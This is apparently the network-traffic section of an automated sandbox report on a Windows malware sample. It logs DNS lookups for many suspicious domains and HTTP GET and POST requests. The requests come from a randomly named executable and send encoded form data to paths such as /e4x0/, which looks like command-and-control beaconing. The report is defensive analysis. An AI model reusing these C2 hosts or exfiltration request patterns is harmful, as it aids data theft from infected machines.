                                                                                                                Oct 9, 2024 14:08:33.389130116 CEST5000880192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:33.394352913 CEST80500083.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:33.397306919 CEST5000880192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:33.405251980 CEST5000880192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:33.410703897 CEST80500083.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:33.861129999 CEST80500083.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:33.861242056 CEST80500083.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:33.861294985 CEST5000880192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:33.864947081 CEST5000880192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:33.869792938 CEST80500083.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:39.059736967 CEST5000980192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:39.065217972 CEST8050009206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:39.069207907 CEST5000980192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:39.081228971 CEST5000980192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:39.086997032 CEST8050009206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:39.958683968 CEST8050009206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:39.958729982 CEST8050009206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:39.958851099 CEST5000980192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:40.589432001 CEST5000980192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:41.605092049 CEST5001080192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:41.610184908 CEST8050010206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:41.610258102 CEST5001080192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:41.623748064 CEST5001080192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:41.629659891 CEST8050010206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:42.498958111 CEST8050010206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:42.499252081 CEST8050010206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:42.499320984 CEST5001080192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:43.132637978 CEST5001080192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:44.411794901 CEST5001180192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:44.416642904 CEST8050011206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:44.416722059 CEST5001180192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:44.548331022 CEST5001180192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:44.553212881 CEST8050011206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:44.553360939 CEST8050011206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:46.054899931 CEST5001180192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:46.060225964 CEST8050011206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:46.060354948 CEST5001180192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:47.073256969 CEST5001280192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:47.078161955 CEST8050012206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:47.081321001 CEST5001280192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:47.089133978 CEST5001280192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:47.093950987 CEST8050012206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:47.992333889 CEST8050012206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:47.992489100 CEST8050012206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:47.992536068 CEST5001280192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:47.995825052 CEST5001280192.168.2.7206.119.82.134
                                                                                                                Oct 9, 2024 14:08:48.000642061 CEST8050012206.119.82.134192.168.2.7
                                                                                                                Oct 9, 2024 14:08:53.031229019 CEST5001380192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:53.036175966 CEST80500133.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:53.036273003 CEST5001380192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:53.050594091 CEST5001380192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:53.055511951 CEST80500133.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:54.443795919 CEST80500133.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:54.443859100 CEST5001380192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:54.554562092 CEST5001380192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:54.559587955 CEST80500133.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:55.573254108 CEST5001480192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:55.578576088 CEST80500143.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:55.581300020 CEST5001480192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:55.593177080 CEST5001480192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:55.598077059 CEST80500143.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:56.058412075 CEST80500143.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:56.058470011 CEST5001480192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:57.103157043 CEST5001480192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:57.107986927 CEST80500143.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:58.121085882 CEST5001580192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:58.126142979 CEST80500153.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:58.126221895 CEST5001580192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:58.138783932 CEST5001580192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:58.143979073 CEST80500153.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:58.144371986 CEST80500153.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:58.690994024 CEST80500153.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:08:58.691077948 CEST5001580192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:59.648252010 CEST5001580192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:08:59.653402090 CEST80500153.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:09:00.669167042 CEST5001680192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:09:00.674000978 CEST80500163.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:09:00.674117088 CEST5001680192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:09:00.683294058 CEST5001680192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:09:00.688425064 CEST80500163.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:09:01.139355898 CEST80500163.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:09:01.139580011 CEST80500163.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:09:01.139755964 CEST5001680192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:09:01.143498898 CEST5001680192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:09:01.148365974 CEST80500163.33.130.190192.168.2.7

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Oct 9, 2024 14:05:50.486934900 CEST6178953192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:05:50.553545952 CEST53617891.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:06:06.292296886 CEST5638453192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:06:06.304501057 CEST53563841.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:06:19.762774944 CEST5076653192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:06:19.790679932 CEST53507661.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:06:33.526163101 CEST5055353192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:06:33.945178986 CEST53505531.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:06:54.215615034 CEST5258753192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:06:54.233349085 CEST53525871.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:07:07.496326923 CEST5092653192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:07:07.508327007 CEST53509261.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:07:15.660657883 CEST5155153192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:07:16.114670038 CEST53515511.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:07:29.260787010 CEST6091153192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:07:29.273308039 CEST53609111.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:07:37.339114904 CEST6448153192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:07:37.462120056 CEST53644811.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:07:50.604825020 CEST6530053192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:07:50.701448917 CEST53653001.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:08:03.965337992 CEST6458353192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:08:04.068960905 CEST53645831.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:08:17.371340990 CEST6363353192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:08:17.614569902 CEST53636331.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:08:25.684480906 CEST6090553192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:08:25.705859900 CEST53609051.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:08:38.871316910 CEST5899553192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:08:39.053755045 CEST53589951.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:08:53.011065960 CEST5057553192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:08:53.026911974 CEST53505751.1.1.1192.168.2.7
                                                                                                                Oct 9, 2024 14:09:07.637315035 CEST6542653192.168.2.71.1.1.1
                                                                                                                Oct 9, 2024 14:09:07.668690920 CEST53654261.1.1.1192.168.2.7

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Oct 9, 2024 14:05:50.486934900 CEST192.168.2.71.1.1.10xf92Standard query (0)www.bluegirls.blogA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:06.292296886 CEST192.168.2.71.1.1.10x6dbeStandard query (0)www.firstcry.shopA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:19.762774944 CEST192.168.2.71.1.1.10x1bStandard query (0)www.cc101.proA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:33.526163101 CEST192.168.2.71.1.1.10x7990Standard query (0)www.myjiorooms.servicesA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:54.215615034 CEST192.168.2.71.1.1.10x10b8Standard query (0)www.mecateg.xyzA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:07.496326923 CEST192.168.2.71.1.1.10x40aaStandard query (0)www.monos.mediaA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:15.660657883 CEST192.168.2.71.1.1.10x8ddeStandard query (0)www.dto20.shopA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:29.260787010 CEST192.168.2.71.1.1.10x416eStandard query (0)www.i16zb920d.cfdA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:37.339114904 CEST192.168.2.71.1.1.10x5776Standard query (0)www.hampelsmagic.lifeA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:50.604825020 CEST192.168.2.71.1.1.10x3348Standard query (0)www.zingara.lifeA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:03.965337992 CEST192.168.2.71.1.1.10x9071Standard query (0)www.polarmuseum.infoA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:17.371340990 CEST192.168.2.71.1.1.10x3b7cStandard query (0)www.trafegomagico.shopA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:25.684480906 CEST192.168.2.71.1.1.10x1c7dStandard query (0)www.consultarfacil.onlineA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:38.871316910 CEST192.168.2.71.1.1.10x5922Standard query (0)www.40wxd.topA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:53.011065960 CEST192.168.2.71.1.1.10xa912Standard query (0)www.allthingsjasmin.comA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:09:07.637315035 CEST192.168.2.71.1.1.10x3f66Standard query (0)www.ophthalmo.cloudA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Oct 9, 2024 14:05:50.553545952 CEST1.1.1.1192.168.2.70xf92No error (0)www.bluegirls.blogbluegirls.blogCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:05:50.553545952 CEST1.1.1.1192.168.2.70xf92No error (0)bluegirls.blog195.110.124.133A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:06.304501057 CEST1.1.1.1192.168.2.70x6dbeNo error (0)www.firstcry.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:06.304501057 CEST1.1.1.1192.168.2.70x6dbeNo error (0)www.firstcry.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:19.790679932 CEST1.1.1.1192.168.2.70x1bNo error (0)www.cc101.pro188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:19.790679932 CEST1.1.1.1192.168.2.70x1bNo error (0)www.cc101.pro188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:33.945178986 CEST1.1.1.1192.168.2.70x7990No error (0)www.myjiorooms.servicesmyjiorooms.servicesCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:33.945178986 CEST1.1.1.1192.168.2.70x7990No error (0)myjiorooms.services3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:33.945178986 CEST1.1.1.1192.168.2.70x7990No error (0)myjiorooms.services15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:06:54.233349085 CEST1.1.1.1192.168.2.70x10b8No error (0)www.mecateg.xyz162.0.238.238A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:07.508327007 CEST1.1.1.1192.168.2.70x40aaName error (3)www.monos.medianonenoneA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:16.114670038 CEST1.1.1.1192.168.2.70x8ddeNo error (0)www.dto20.shopdto20.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:16.114670038 CEST1.1.1.1192.168.2.70x8ddeNo error (0)dto20.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:16.114670038 CEST1.1.1.1192.168.2.70x8ddeNo error (0)dto20.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:29.273308039 CEST1.1.1.1192.168.2.70x416eName error (3)www.i16zb920d.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:37.462120056 CEST1.1.1.1192.168.2.70x5776No error (0)www.hampelsmagic.lifehampelsmagic.lifeCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:37.462120056 CEST1.1.1.1192.168.2.70x5776No error (0)hampelsmagic.life76.223.67.189A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:37.462120056 CEST1.1.1.1192.168.2.70x5776No error (0)hampelsmagic.life13.248.213.45A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:50.701448917 CEST1.1.1.1192.168.2.70x3348No error (0)www.zingara.lifeshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:07:50.701448917 CEST1.1.1.1192.168.2.70x3348No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:04.068960905 CEST1.1.1.1192.168.2.70x9071No error (0)www.polarmuseum.info199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:17.614569902 CEST1.1.1.1192.168.2.70x3b7cServer failure (2)www.trafegomagico.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:25.705859900 CEST1.1.1.1192.168.2.70x1c7dNo error (0)www.consultarfacil.onlineconsultarfacil.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:25.705859900 CEST1.1.1.1192.168.2.70x1c7dNo error (0)consultarfacil.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:25.705859900 CEST1.1.1.1192.168.2.70x1c7dNo error (0)consultarfacil.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:39.053755045 CEST1.1.1.1192.168.2.70x5922No error (0)www.40wxd.top40wxd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:39.053755045 CEST1.1.1.1192.168.2.70x5922No error (0)40wxd.top206.119.82.134A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:53.026911974 CEST1.1.1.1192.168.2.70xa912No error (0)www.allthingsjasmin.comallthingsjasmin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:53.026911974 CEST1.1.1.1192.168.2.70xa912No error (0)allthingsjasmin.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:53.026911974 CEST1.1.1.1192.168.2.70xa912No error (0)allthingsjasmin.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:09:07.668690920 CEST1.1.1.1192.168.2.70x3f66No error (0)www.ophthalmo.cloud217.160.0.207A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • www.bluegirls.blog
                                                                                                                • www.firstcry.shop
                                                                                                                • www.cc101.pro
                                                                                                                • www.myjiorooms.services
                                                                                                                • www.mecateg.xyz
                                                                                                                • www.dto20.shop
                                                                                                                • www.hampelsmagic.life
                                                                                                                • www.zingara.life
                                                                                                                • www.polarmuseum.info
                                                                                                                • www.consultarfacil.online
                                                                                                                • www.40wxd.top
                                                                                                                • www.allthingsjasmin.com

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.749869195.110.124.133801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:05:50.575087070 CEST417OUTGET /ptae/?ZZY=w3WU5oZhC+LnKx26kaNk+YWYu6qqBKD6PC4MUwZYu/Z6/i99bgGsvL6SKkltDKfqu2CGNTh4TErFYwL/tEu+bdChCdZ/afdxeSWGORoCU6iTOQ97Sy+G7WrM0B37ODseprTGeRopW7u8&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.bluegirls.blog
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:05:51.247927904 CEST367INHTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:05:51 GMT
                                                                                                                Server: Apache
                                                                                                                Content-Length: 203
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 74 61 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ptae/ was not found on this server.</p></body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.74994613.248.169.48801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:06.326176882 CEST677OUTPOST /e4x0/ HTTP/1.1
                                                                                                                Host: www.firstcry.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.firstcry.shop
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.firstcry.shop/e4x0/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 47 50 37 57 6f 45 4c 34 4c 49 44 58 4e 56 78 37 38 53 49 73 4e 37 4c 37 57 33 75 6c 54 58 48 2b 35 64 35 2f 73 7a 6e 65 62 5a 6a 47 49 4d 46 6e 49 35 6b 61 45 39 38 74 62 53 5a 4d 6f 6a 4c 33 6a 67 53 66 70 66 45 49 64 36 32 43 33 69 33 37 57 52 58 51 45 79 59 49 6a 57 4a 38 6e 49 76 78 69 51 46 4d 6a 54 71 43 2b 65 4a 67 53 47 4c 53 69 32 5a 77 4f 51 49 77 36 65 53 6f 37 34 64 61 37 66 70 65 50 73 71 43 47 66 34 58 30 4d 6f 47 51 6d 38 6e 57 32 75 58 56 75 6a 45 45 49 2f 50 75 48 33 77 69 78 64 6d 79 37 6c 56 68 67 76 48 6c 38 68 55 32 33 5a 32 50 34 70 36 41 6a 6d 74 45 67 38 53 72 41 39 4c 38 73 63 70 76 79 47 4c 32 51 3d 3d
                                                                                                                Data Ascii: ZZY=GP7WoEL4LIDXNVx78SIsN7L7W3ulTXH+5d5/sznebZjGIMFnI5kaE98tbSZMojL3jgSfpfEId62C3i37WRXQEyYIjWJ8nIvxiQFMjTqC+eJgSGLSi2ZwOQIw6eSo74da7fpePsqCGf4X0MoGQm8nW2uXVujEEI/PuH3wixdmy7lVhgvHl8hU23Z2P4p6AjmtEg8SrA9L8scpvyGL2Q==


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.74996113.248.169.48801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:08.870631933 CEST697OUTPOST /e4x0/ HTTP/1.1
                                                                                                                Host: www.firstcry.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.firstcry.shop
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.firstcry.shop/e4x0/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 47 50 37 57 6f 45 4c 34 4c 49 44 58 4d 31 42 37 2b 7a 49 73 4b 62 4c 34 61 58 75 6c 4b 6e 48 36 35 64 39 2f 73 79 54 4f 62 76 7a 47 49 75 64 6e 4c 37 4d 61 44 39 38 74 55 79 5a 4e 73 6a 4c 38 6a 67 4f 68 70 64 51 49 64 36 79 43 33 67 76 37 58 6d 44 66 46 69 59 4b 70 47 4a 2b 36 59 76 78 69 51 46 4d 6a 51 57 38 2b 61 74 67 52 33 37 53 74 33 5a 7a 45 77 49 78 39 65 53 6f 2f 34 64 65 37 66 6f 4c 50 74 32 6b 47 5a 30 58 30 4f 41 47 51 58 38 67 46 57 75 64 52 75 69 4b 48 4c 66 48 73 30 44 64 6d 6a 64 36 79 62 4e 76 70 32 79 6c 2f 65 74 34 6f 6d 68 4e 4c 36 4e 4d 58 46 37 59 47 68 34 4b 6d 69 4a 71 6a 62 35 44 69 67 6e 50 67 6d 38 69 33 44 45 46 70 74 55 44 63 63 59 56 65 65 33 32 31 5a 38 3d
                                                                                                                Data Ascii: ZZY=GP7WoEL4LIDXM1B7+zIsKbL4aXulKnH65d9/syTObvzGIudnL7MaD98tUyZNsjL8jgOhpdQId6yC3gv7XmDfFiYKpGJ+6YvxiQFMjQW8+atgR37St3ZzEwIx9eSo/4de7foLPt2kGZ0X0OAGQX8gFWudRuiKHLfHs0Ddmjd6ybNvp2yl/et4omhNL6NMXF7YGh4KmiJqjb5DignPgm8i3DEFptUDccYVee321Z8=


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.74997113.248.169.48801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:11.670664072 CEST1710OUTPOST /e4x0/ HTTP/1.1
                                                                                                                Host: www.firstcry.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.firstcry.shop
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.firstcry.shop/e4x0/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
